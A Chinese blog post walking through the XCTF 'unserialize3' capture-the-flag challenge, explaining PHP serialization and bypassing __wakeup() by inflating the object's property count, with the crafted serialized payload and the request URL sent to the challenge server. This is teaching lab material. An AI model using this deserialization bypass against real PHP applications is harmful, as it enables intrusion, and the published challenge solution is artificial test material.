php反序列化-unserialize3
2024-09-07 12:57:20
unserialize3-php反序列化
unserialize3
环境地址:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4821&page=1
打开代码
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=
_wakeup经常用在反序列化操作中,例如重新建立数据库连接,或执行其他初始化操作。所以猜测被反序列化了
但是这里看到这里没有特别对哪个字符串序列化,所以把xctf类实例化后,进行反序列化利用php中的new运算符,实例化类xctf
new是申请空间的操作符,一般用于类
比如定义了一个class a{public i=0;}
$c = new a(); 相当于定义了一个基于a类的对象,这时候 $c->i 就是0
(参考https://zhidao.baidu.com/question/495110936393795804.html)
写一段php代码执行(网上就有php代码在线执行)
<?php
class xctf{ //类
public $flag = '111';//public定义flag变量公开可见
public function __wakeup(){
exit('bad requests');
}
}
$a=new xctf();
echo(serialize($a));
?>
得出结果
O:4:"xctf":1:{s:4:"flag";s:3:"111";}
如果直接传参给code会被_wakeup()函数再次序列号,所以要绕过他,利用 _wakeup函数漏洞原理:当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过 _wakeup的执行。
序列化返回的字符串格式:
O:<length>:"<class name>":<n>:{<field name 1><field value 1>...<field name n><field value n>}
O:表示序列化的是对象
:表示序列化的类名称长度
:表示序列化的类的名称
:表示被序列化的对象的属性个数
<field name 1>:属性名
<field value 1>:属性值
所以要修改属性个数,既把1改为2以上
O:4:"xctf":2:{s:4:"flag";s:3:"111";}
传参给code,得到flag:
http://111.200.241.244:61154/index.php?code=O:4:%22xctf%22:2:{s:4:%22flag%22;s:3:%22111%22;}
最新文章
- 通过Jni实现AES的CBC模式加密解密
- use case
- 为知笔记 Markdown 新手指南
- Java 并发同步器之CountDownLatch、CyclicBarrier
- java的动态代理机制
- (转)Qt Model/View 学习笔记 (四)——创建新的Models
- selinux理解1-selinux介绍
- Erlang ODBC 处理中文
- java课程设计(Calculator) 201521123027 陈龙
- HDU 1724 Ellipse [辛普森积分]
- 3.3.5 DMA写时发生Cache命中的优化
- git相关的操作
- 指定的 CGI 应用程序遇到错误,服务器终止了该进程。
- hive权限配置
- iptables和firewalld的配置
- [蓝桥杯]ALGO-101.算法训练_图形显示
- 怎么把PNG图的位深度24位变成32位
- FTP原理和虚拟用户映射登录-2019.2.8
- Redhat6.8安装Oracle11g下遇到两个问题记录
- 棋盘游戏 HDU - 1281 (删点 二分匹配)